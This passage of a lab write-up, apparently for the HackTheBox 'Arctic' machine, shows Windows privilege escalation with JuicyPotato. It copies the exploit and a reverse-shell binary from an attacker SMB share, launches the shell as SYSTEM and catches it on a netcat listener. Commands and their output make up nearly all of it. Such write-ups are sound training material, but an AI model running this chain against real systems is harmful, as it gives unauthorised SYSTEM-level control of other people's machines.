JuicyPotato
juicypotato binaries can be found here
The current user has SeImpersonatePrivilege enabled
Privilege Escalation
C:\tmp> copy \\10.10.14.5\smb\JuicyPotato.exe
copy \\10.10.14.5\smb\JuicyPotato.exe
1 file(s) copied.
C:\tmp>copy \\10.10.14.5\smb\pe.exe
copy \\10.10.14.5\smb\pe.exe
1 file(s) copied.
Transfer the exploit binary and reverse shell to the target system
C:\tmp> JuicyPotato.exe -t * -p "C:\tmp\pe.exe" -l 39942
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 39942
....
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
Executing the exploit
┌──(kali㉿kali)-[~/archive/htb/labs/arctic]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.11] 49444
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
whoami
nt authority\system
C:\Windows\system32> hostname
hostname
arctic
C:\Windows\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.10.11
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{79F1B374-AC3C-416C-8812-BF482D048A22}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Tunnel adapter Local Area Connection* 9:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
System Level Compromise